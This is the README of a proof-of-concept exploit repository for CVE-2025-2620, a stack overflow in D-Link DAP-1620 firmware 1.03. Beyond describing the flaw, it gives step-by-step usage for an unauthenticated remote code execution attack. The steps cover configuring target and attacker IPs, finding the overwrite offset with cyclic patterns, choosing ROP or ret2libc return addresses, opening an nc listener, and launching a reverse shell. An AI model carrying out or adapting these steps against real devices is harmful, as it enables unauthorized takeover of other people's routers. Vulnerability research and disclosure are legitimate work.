# CVE-2025-2620 Proof-of-Concept Exploit

## Overview
This repository contains an advanced proof-of-concept (PoC) exploit for **CVE-2025-2620**, a critical **stack-based buffer overflow** vulnerability discovered in the **D-Link DAP-1620** router running firmware version **1.03**. This vulnerability allows **unauthenticated remote attackers** to crash the router’s web server (**Denial-of-Service, DoS**) and potentially execute arbitrary code (**Remote Code Execution, RCE**).

The purpose of this project is to **demonstrate exploit development skills**.

## Vulnerability Details

### CVE Description
CVE-2025-2620 affects the **D-Link DAP-1620** router’s **mod_graph_auth_uri_handler** function, specifically within the `/storage` endpoint. The vulnerability is caused by **improper bounds checking**, allowing an attacker to send a large input that exceeds the allocated buffer size, leading to a **stack-based buffer overflow**.

### **Impact**
- **Denial-of-Service (DoS)**: Crashes the router’s HTTP server, making it unresponsive until a reboot.
- **Remote Code Execution (RCE)**: Attackers can **overwrite the return address** and execute arbitrary code on the router’s **MIPS-based architecture**.
- **No Authentication Required**: The vulnerability can be triggered remotely without credentials, increasing its severity.

### **Technical Breakdown**

The vulnerable function processes an authentication parameter (`auth`) from HTTP requests:

```c
void mod_graph_auth_uri_handler(char *input) {
    char buffer[512];  // Fixed-size stack buffer
    strcpy(buffer, input);  // No length check, causes overflow
    // Process authentication...
}
```

An attacker sending an oversized payload (e.g., 1024+ bytes) **overwrites adjacent memory**, including the **function’s return address**, potentially leading to **code execution**.

### **CVSS v3.1 Score: 9.8 (Critical)**
| Metric                  | Value  |
|------------------------|--------|
| **Attack Vector**      | Network |
| **Attack Complexity**  | Low |
| **Privileges Required** | None |
| **User Interaction**   | None |
| **Confidentiality Impact** | High |
| **Integrity Impact**   | High |
| **Availability Impact** | High |

## Affected Devices

The **D-Link DAP-1620** is a **Wi-Fi range extender** with the following specifications:

- **CPU**: Realtek RTL8197F (MIPS 24Kc, ~600 MHz)
- **RAM**: 64 MB
- **Flash**: 16 MB
- **Wi-Fi**: Dual-band 802.11ac
- **Firmware**: **1.03** (confirmed vulnerable)

Other **D-Link routers/extenders** with similar firmware **may also be affected**.

## Disclosure Timeline

- **March 22, 2025** – CVE-2025-2620 published on **NVD/MITRE**.
- **March 22, 2025** – This PoC developed and tested.
- **March 22, 2025** – No official patch from D-Link as of this date.

## PoC Exploit Details

### **Features**
  **Combined PoC** – Includes both buffer overflow testing and RCE exploit.  
  **Stack-based buffer overflow test** – Identifies vulnerable routers.  
  **Full remote code execution (RCE) exploit** – Spawns a reverse shell.  
  **Configurable payload size & return address** – Adaptable for different router models.  
  **Enhanced Debugging** – Logs crash offsets to refine exploit parameters.  

## Installation & Usage

### **Step 1: Clone the Repository**
```bash
git clone https://github.com/Otsmane-Ahmed/CVE-2025-2620-poc.git
cd CVE-2025-2620-poc
```

### **Step 2: Install Dependencies**
Ensure you have Python3 and pwntools installed:
```bash
pip install pwntools
```

### **Step 3: Configure the Exploit**
Modify the `CVE-2025-2620_poc.py` script:

#### **Set the router’s IP:**
```python
TARGET_IP = "192.168.0.1"  # change to match your router
```

#### **Set your attack machine’s IP:**
```python
ATTACKER_IP = "192.168.0.100"  # change to your local IP
ATTACKER_PORT = 4444  # change if needed
```

#### **Adjust buffer size if needed:**
```python
BUFFER_SIZE = 8000  # Increase if the router does not crash
```

#### **Find EIP offset and set return address:**

##### **Step 1: Send a Cyclic Pattern**
Modify the PoC to generate a unique pattern and send it:

```python
MODE = "overflow"  # Set to "overflow" to find the offset
```
Run the script:
```bash
python3 CVE-2025-2620_poc.py
```

##### **Step 2: Check the Crash Address**
After crashing the router, check the **segfault address** (`EIP` on x86 or `RA` on MIPS) from:
- **Router logs**
- **Debugger (`gdb`)**
- **`dmesg | grep 'segfault'`**

Look for an address like **0x61616161** (which means part of the cyclic pattern overwrote the return pointer).

##### **Step 3: Find the Offset**
Use `cyclic_find` to locate the exact **offset**:

```python
from pwn import cyclic_find
print(cyclic_find(0x61616161))  # Replace with the crash address
```

This gives the exact **OFFSET** value. Update your PoC:

```python
OFFSET = <FOUND OFFSET>  # Replace with the actual number
```

##### **Step 4: Find a Suitable Return Address (`RET_ADDR`)**
- **Option 1: Find a JMP or CALL Gadget**
  ```bash
  ROPgadget --binary vulnerable_binary | grep "jmp"
  ```
  Pick an address that jumps to a **register** (e.g., `jmp $sp` or `jmp $ra`).

- **Option 2: Use a `ret2libc` Address**
  Find the address of `system()` in **libc**:
  ```bash
  objdump -D /lib/libc.so.6 | grep "system"
  ```
  Then, use it as `RET_ADDR`:
  ```python
  RET_ADDR = struct.pack("<I", 0xdeadbeef)  # Replace with actual address
  ```

### **Step 4: Start a Listener**
```bash
nc -lvnp 4444
```

### **Step 5: Run the Exploit**
```bash
python3 CVE-2025-2620_poc.py --mode rce
```

**Developed with ❤️ by Otsmane Ahmed**
